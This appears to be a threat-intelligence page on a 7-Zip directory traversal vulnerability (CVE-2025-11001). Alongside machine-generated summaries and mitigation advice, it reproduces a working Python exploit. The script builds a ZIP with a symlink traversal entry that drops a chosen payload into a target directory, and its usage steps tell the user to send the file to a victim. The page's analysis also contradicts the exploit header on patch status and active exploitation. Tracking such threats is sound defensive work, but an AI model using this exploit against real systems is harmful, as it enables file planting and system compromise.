7-Zip 24.00 - Directory Traversal
7-Zip 24.00 - Directory Traversal
AI Analysis
Technical Summary
The 7-Zip 24.00 application is affected by a directory traversal vulnerability that can be exploited locally. This flaw enables an attacker to craft archive files that, when extracted, write files to arbitrary locations outside the target extraction folder. The exploit code is available in Python, demonstrating the vulnerability. No affected versions list or patch information is provided, and the vulnerability is not cloud-based.
Potential Impact
Successful exploitation could allow an attacker with local access to write files to arbitrary locations on the filesystem, potentially overwriting critical files or placing malicious executables. This could lead to privilege escalation or persistence depending on the system configuration and user privileges. There is no evidence of active exploitation in the wild.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, users should exercise caution when extracting archives from untrusted sources and consider running extraction processes with least privilege to limit potential impact.
Indicators of Compromise
- exploit-code: # Exploit Title: 7-Zip < 25.00 - Directory Traversal to RCE via Malicious ZIP # Date: 2025-11-22 # Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # GitHub: https://github.com/mbanyamer # Vendor Homepage: https://www.7-zip.org # Software Link: https://www.7-zip.org/download.html # Version: 7-Zip < 25.00 # Tested on: Windows 10 / Windows 11 (7-Zip 24.xx) # CVE: CVE-2025-11001 # CVSS: 8.8 (High) - draft estimation # Category: Local Privilege Escalation / Remote Code Execution # Platform: Windows # CRITICAL: Yes - Public exploit available, active exploitation reported # Including: Directory Traversal via crafted symlink entry in ZIP archive # Impact: Full system compromise when extracting malicious archive with 7-Zip as Administrator # Fix: Upgrade to 7-Zip 25.00 or later # Advisory: https://www.7-zip.org/history.txt # Patch: https://github.com/ip7z/7zip/releases/tag/25.00 # Target: Windows systems running vulnerable 7-Zip versions import struct import os import argparse import sys def build_zip(target_path, payload_file, output_zip): if not os.path.isfile(payload_file): print(f"[-] Payload file not found: {payload_file}") sys.exit(1) payload_name = os.path.basename(payload_file) payload_data = open(payload_file, "rb").read() target = target_path.replace("\\", "/").strip("/") + "/" traversal = "../../../../" + target with open(output_zip, "wb") as f: offset = 0 symlink_name = "evil.lnk" symlink_target = traversal.encode() + b"\x00" symlink_extra = struct.pack("<HH", 0x756e, len(symlink_target)) + symlink_target symlink_header = struct.pack("<IHHHHHHIIIHH", 0x04034b50, 20, 0x800, 0x800, 0, 0, 0, 0, 0, 0, len(symlink_name), len(symlink_extra)) f.write(symlink_header) f.write(symlink_name.encode()) f.write(symlink_extra) f.write(b"") symlink_central_offset = offset offset += len(symlink_header) + len(symlink_name) + len(symlink_extra) payload_header = struct.pack("<IHHHHHHIIIHH", 0x04034b50, 20, 0x800, 0, 0, 0, 0, len(payload_data), len(payload_data), len(payload_name), 0) f.write(payload_header) f.write(payload_name.encode()) f.write(payload_data) payload_central_offset = offset offset += len(payload_header) + len(payload_name) + len(payload_data) cd_offset = offset f.write(struct.pack("<IHHHHHHIIIHHHHHII", 0x02014b50, 0x0317, 20, 0x800, 0, 0, 0, 0, 0, 0, len(symlink_name), len(symlink_extra), 0, 0, 0, 0o777 << 16 | 0xA1ED, symlink_central_offset)) f.write(symlink_name.encode()) f.write(symlink_extra) f.write(struct.pack("<IHHHHHHIIIHHHHHII", 0x02014b50, 0x0317, 20, 0x800, 0, 0, 0, 0, len(payload_data), len(payload_data), len(payload_name), 0, 0, 0, 0, 0o777 << 16, payload_central_offset)) f.write(payload_name.encode()) f.write(struct.pack("<IHHHHIIH", 0x06054b50, 0, 0, 2, 2, offset, cd_offset, 0)) print(f"[+] Malicious archive created: {output_zip}") print(f"[+] Target path : {target_path}") print(f"[+] Payload file : {payload_name} ({len(payload_data)} bytes)") print(f"[+] Final write location : {target_path}\\{payload_name}") print("\n[*] Usage:") print(" 1. Send the ZIP file to the victim") print(" 2. Victim must run 7-Zip < 25.00 as Administrator") print(" 3. Victim opens and extracts the ZIP → payload dropped silently") print(" 4. Achievement unlocked") if __name__ == "__main__": banner = """ CVE-2025-11001 - 7-Zip Directory Traversal PoC Author: Mohammed Idrees Banyamer (@banyamer_security) """ print(banner) parser = argparse.ArgumentParser(description="CVE-2025-11001 Exploit - 7-Zip < 25.00") parser.add_argument("-t", "--target", required=True, help="Target directory (e.g. C:\\Windows\\System32)") parser.add_argument("-p", "--payload", required=True, help="Payload file to drop (e.g. C:\\Windows\\System32\\calc.exe)") parser.add_argument("-o", "--output", default="CVE-2025-11001-exploit.zip", help="Output ZIP filename (default: CVE-2025-11001-exploit.zip)") args = parser.parse_args() build_zip(args.target, args.payload, args.output)
7-Zip 24.00 - Directory Traversal
Description
7-Zip 24.00 - Directory Traversal
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The 7-Zip 24.00 application is affected by a directory traversal vulnerability that can be exploited locally. This flaw enables an attacker to craft archive files that, when extracted, write files to arbitrary locations outside the target extraction folder. The exploit code is available in Python, demonstrating the vulnerability. No affected versions list or patch information is provided, and the vulnerability is not cloud-based.
Potential Impact
Successful exploitation could allow an attacker with local access to write files to arbitrary locations on the filesystem, potentially overwriting critical files or placing malicious executables. This could lead to privilege escalation or persistence depending on the system configuration and user privileges. There is no evidence of active exploitation in the wild.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, users should exercise caution when extracting archives from untrusted sources and consider running extraction processes with least privilege to limit potential impact.
Technical Details
- Edb Id
- 52501
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for 7-Zip 24.00 - Directory Traversal
# Exploit Title: 7-Zip < 25.00 - Directory Traversal to RCE via Malicious ZIP # Date: 2025-11-22 # Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # GitHub: https://github.com/mbanyamer # Vendor Homepage: https://www.7-zip.org # Software Link: https://www.7-zip.org/download.html # Version: 7-Zip < 25.00 # Tested on: Windows 10 / Windows 11 (7-Zip 24.xx) # CVE: CVE-2025-11001 # CVSS: 8.8 (High) - draft estimation # Category: Local Privilege Escalation /... (3965 more characters)
Threat ID: 69d842c21cc7ad14da3f5b24
Added to database: 4/10/2026, 12:22:26 AM
Last enriched: 4/17/2026, 2:43:30 PM
Last updated: 5/25/2026, 5:33:00 AM
Views: 145
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.